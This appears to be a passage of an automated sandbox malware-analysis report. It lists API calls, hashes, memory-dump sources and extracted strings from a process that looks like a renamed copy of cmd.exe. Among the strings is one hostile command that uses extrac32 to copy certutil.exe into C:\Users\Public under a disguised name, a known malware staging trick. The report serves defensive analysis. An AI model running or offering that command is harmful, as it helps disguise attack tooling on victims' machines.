                                                                                      • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                      • Instruction ID: f120436d043271a51e2ef023bf11f40e8e919471000b571f205104a79d67a217
                                                                                      • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                                                                      • Instruction Fuzzy Hash: 4152B732A08B828AFBB4AB34D8942F9B7A9FB4D749F804135DA0E57794DF3CE5458710
                                                                                      Similarity
                                                                                      • API ID: wcsrchr$towlower
                                                                                      • String ID: fdpnxsatz
                                                                                      • API String ID: 3267374428-1106894203
                                                                                      • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                      • Instruction ID: eead57a7056066771a47ef280311f3ecdd1b8fe242ca2862212c130df97d6890
                                                                                      • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                                                                      • Instruction Fuzzy Hash: 9442D122B0868285FFB8AF3594942B9A7A9FF49B95F844136DE0E277C4DF3CE4418310
                                                                                      Similarity
                                                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 95024817-2010427443
                                                                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                      • Instruction ID: 69c5410513cdd84b1b0d82d47f2a7c51d9b56d582523f953fabbb649949b1d22
                                                                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                      • Instruction Fuzzy Hash: AD12D932A08A8286E7B4AF35A49017EF7A9FB8D754F845139DA5E63794DF3CE400CB11
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                                      • API String ID: 0-1980097535
                                                                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                      • Instruction ID: 32939a931d645d408289e3459cfb5f167e87ea1ffd00ab3005993394c5ce36fd
                                                                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                      • Instruction Fuzzy Hash: 2D32AD72A08A8286FBB0EF31D4942F9A3A9EB4D788F814135DA0D67795DF3CE505C721
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                      • API String ID: 1795611712-3662956551
                                                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                      • Instruction ID: db262f3625d67f43cb20ef05c3c84e330d6d1a973b02728c9524b71be3bc1636
                                                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                      • Instruction Fuzzy Hash: 56E1D421A0864296FBB0AB75A8D41B9E7AAFF4C788FD44132D90E77694DF3CE504C760
                                                                                      APIs
                                                                                      • _wcsupr.MSVCRT ref: 00007FF79376EF33
                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EF98
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFA9
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFBF
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF79376EFDC
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376EFED
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F003
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F022
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F083
                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F092
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F0A5
                                                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF79376F0DB
                                                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F135
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F16C
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF79376F185
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      Similarity
                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                      • API String ID: 1161012917-1690691951
                                                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                      • Instruction ID: 35e4c5f9586bdeb157bc310c5422c212d53664bdf5e996af7644c1748db0d948
                                                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                      • Instruction Fuzzy Hash: CF91B321B08A428AFBA4BB70E4901BDAAA8AF4DB59F844135DD0E227D5DF3CA445C331
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937432F3
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7937432A4), ref: 00007FF793743309
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF793743384
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7937611DF
                                                                                      Similarity
                                                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                      • String ID:
                                                                                      • API String ID: 611521582-0
                                                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                      • Instruction ID: 1024800e6a315cf538b7e5550c814a7c5e23c7cffaecf74d7de7b1c496502add
                                                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                      • Instruction Fuzzy Hash: 9AA1B421F08A1286F7A8AB71A8942BDF6A9FB4D755F844135CD0E67780DF3CE445C760
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                      • String ID: \\?\
                                                                                      • API String ID: 628682198-4282027825
                                                                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                      • Instruction ID: 888874fefe8e5dba98a2398dea397f50e1e495a6ac4a100a36afa1ca7df43e54
                                                                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                      • Instruction Fuzzy Hash: C2E1CF22B0868296FBB5BB34D8843F9A3A9FB48749F804135DA0E567D4EF3CE545C320
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                       • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                       • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 16309207-0
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 3863671652-4137775220
                                                                                      Similarity
                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                      • String ID: $Application$System
                                                                                      • API String ID: 3538039442-1881496484
                                                                                      APIs
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF79376048E), ref: 00007FF79376DA58
                                                                                      • memset.MSVCRT ref: 00007FF79376DAD6
                                                                                      • memset.MSVCRT ref: 00007FF79376DAFC
                                                                                      • memset.MSVCRT ref: 00007FF79376DB22
                                                                                        • Part of subcall function 00007FF793753A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79376EAC5,?,?,?,00007FF79376E925,?,?,?,?,00007FF79374B9B1), ref: 00007FF793753A56
                                                                                        • Part of subcall function 00007FF793745194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7937451C4
                                                                                        • Part of subcall function 00007FF79375823C: FindFirstFileExW.KERNELBASE ref: 00007FF793758280
                                                                                        • Part of subcall function 00007FF79375823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79375829D
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                        • Part of subcall function 00007FF793744FE8: _get_osfhandle.MSVCRT ref: 00007FF793745012
                                                                                        • Part of subcall function 00007FF793744FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745030
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376DDB0
                                                                                        • Part of subcall function 00007FF7937459E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793745A2E
                                                                                        • Part of subcall function 00007FF7937459E4: _open_osfhandle.MSVCRT ref: 00007FF793745A4F
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79376DDEB
                                                                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF79376DDFA
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E204
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E223
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF79376E242
                                                                                      Similarity
                                                                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                      • String ID: %9d$%s$~
                                                                                      • API String ID: 3651208239-912394897
                                                                                      Similarity
                                                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                      • String ID: COPYCMD$\
                                                                                      • API String ID: 3989487059-1802776761
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                      • API String ID: 55602301-2548490036
                                                                                      Similarity
                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                      • String ID:
                                                                                      • API String ID: 3935429995-0
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      Similarity
                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                      • String ID: DPATH
                                                                                      • API String ID: 3260997497-2010427443
                                                                                      Similarity
                                                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                      • String ID: @P
                                                                                      • API String ID: 1801357106-3670739982
                                                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction ID: 07a310ec3385f6090517ae5a75bc55b505680dcf7c1cc1ddd5d139ec852559d9
                                                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                      • Instruction Fuzzy Hash: 7A415B32B04A45DBE760AF71D4903EDABA4FB8D749F848235DA0E62A88DF78D504C760
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                                      • String ID:
                                                                                      • API String ID: 1034426908-0
                                                                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                      • Instruction ID: 32f84511e5a0c2f69d9f1d9c75c3c929c7d3d2d0441e52b48a62a944e0ea97c9
                                                                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                      • Instruction Fuzzy Hash: 01F1BF32B087828AFBB4EB31D8942E9A7A9FF49788F804135DA4E57695DF38F514C710
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                      • API String ID: 4081037667-3301834661
                                                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction ID: c85f29e33077a8ae4b0a206c57708b77cc62c0eebc171386298c5fff59c74b30
                                                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction Fuzzy Hash: B371A6B1B09B4282FAF06B35A0A02B9E299FF4D759FC44131DA4E27794DF3CD5458722
                                                                                      APIs
                                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AA85
                                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AACF
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AAEC
                                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376AB39
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376AB6F
                                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376ABA4
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376ABCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                                      • String ID: %s=%s
                                                                                      • API String ID: 1019019434-1087296587
                                                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                      • Instruction ID: 7a0b687676b13c6bc2408c195fd844c6ad639bdde394fdf910cd73ad87508b4d
                                                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                      • Instruction Fuzzy Hash: 47519271B08B8286F7F0AB35A49476AF6A9FB8D785F848235CA4D53790DF38D4418B21
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpwcsrchr
                                                                                      • String ID: COPYCMD
                                                                                      • API String ID: 2429825313-3727491224
                                                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction ID: 0f49e07b447f92b0ccabdd9ae49eddcaa90ef7d20f2cd443f013990cffafee3f
                                                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction Fuzzy Hash: DEF19322F0C64286FBB0BF7190D41BDA6AAAB0D798F804235DE5E336D4DE3CA551C761
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$FullNamePathwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4289998964-0
                                                                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                      • Instruction ID: afd4bbec3987b32156c2e3564cd082da50496a8e9a4a61a2387741423cf30f38
                                                                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                      • Instruction Fuzzy Hash: F9C1D321B0974682FAF4BB61D5A8379A3A9FB49B94F805535CE0E23BD0DF3CB4518721
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3476366620-0
                                                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction ID: cdc1dc0ad6f2ad139372249e686a0d83d402bd3af73a861a8234750e8de69f42
                                                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction Fuzzy Hash: 89212C20908E4296FAB47B3194952B8E6A9FF4E716FC44235C51E763E2DF3CA5058721
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                      • String ID: %9d
                                                                                      • API String ID: 1006866328-2241623522
                                                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                      • Instruction ID: 6cc7a72e0eaf882d23c485a1ee43cd169a1057de075b5abd364f400e3ac8c1ca
                                                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                      • Instruction Fuzzy Hash: 58515471A086429AF7A0AF31D8C45A9BBB8FB48764F804635D96D63795CF3CE904CB20
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
